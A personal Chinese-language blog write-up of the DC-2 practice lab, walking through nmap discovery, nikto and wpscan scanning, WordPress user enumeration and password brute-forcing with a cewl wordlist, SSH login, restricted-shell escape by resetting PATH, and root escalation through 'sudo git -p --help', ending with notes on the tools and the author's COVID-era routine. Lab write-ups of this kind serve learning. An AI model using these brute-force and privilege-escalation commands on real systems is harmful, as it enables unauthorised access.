前言
最近老是因为睡不醒 核酸检测影响学习进度
那就找时间给自己镀金吧!!!
时间都是挤出来的!!!
正文
1.
使用nmap先探测该网段存活的主机
nmap 192.168.61.0/24
这里我们可以根据MAC地址来判断靶机的ip
并且可以发现是开启了80端口的服务
2.
这里就想起来以前遇到的一个东西
因为国内不能访问某些网站
了解到可以在hosts文件内添加该网站的ip
所以下面我们打开etc/hosts
添加上一行
ip DC-2
访问后可直接得到第一个flag根据翻译:
3.
分析后台可登录页面
利用nikto对ip进行普通扫描
nikto -h DC-2
查看ip下的信息在这里我们发现了wordpress
是可以登录的页面
下一步,对于使用wordpress搭建博客的师傅们,是很熟悉的,就是进入wordpress的后台登进页面
进
下面使用一个针对wordpress的扫描工具
wpscan
wpscan --update 更新
wpscan --url dc-2 -e u 爆破出该页面可以登陆的amdin
得到一下信息
找到用户名
下面爆破密码
这里使用上面提到的cewl
密码攻击工具
vim /tm/user,list 生成用户表
cat /tmp/user.list 查看用户表,使用的用户名都是上面爆破出来的

wpscan --url dc-2 -U /tmp/user.list -P /tmp/password.list 爆破密码
登进
发现第二个flag
4.
使用tom用户进行ssh远程连接
ssh tom@dc-2 -p 7744
这里输入上一步爆破出来Tom用户的密码这里我输错了两次…
成功后
我们查看所有的目录
这里失败了
查看命令存放目录和可食用的命令
echo $PATH
ls usr/bin
这里切换为bash的命令解释
bin/bash后可以使用运行上述命令
给Tom用户添加环境变量
export PATH=PATH:/usr/bin:/sbin
PATH用来定义/usr/bin:/sbin等这些路径的变量,其中冒号为目录间的分割符。
得到第三个flag
5.
切换回jerry用户
su jerry

cd /home/jerry
查看到flag4.txt
提示我们git
查看sudo文件
sudo是linux下常用的允许普通用户使用超级用户权限的工具,允许系统管理员让普通用户执行一些或者全部的root命令

这里提示git的话是不需要密码的
sudo git -p --help //利用git进行提权
!whoami //发现现在就是root权限
!password root //修改密码
这里修改成功
登入
一些工具:
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。
写在最后:
中间对linux命令不熟悉,有点卡住,在网上看了一些rbash限制绕过的文章和一些渗透笔记,只能说这一块内容是了解了,但一旦牵扯到其他内容就不会了。平时对linux的指令了解并不多,只是简单的管道符和一些特定的绕过替换方式一些使用。
这几天核酸检测可把我着实累坏了,但是必须做的是就是没有条件的服从,三下乡回来后就一直学习+睡觉。希望这轮疫情早点过去,能够让我出去跑步,聚餐…
加油!!!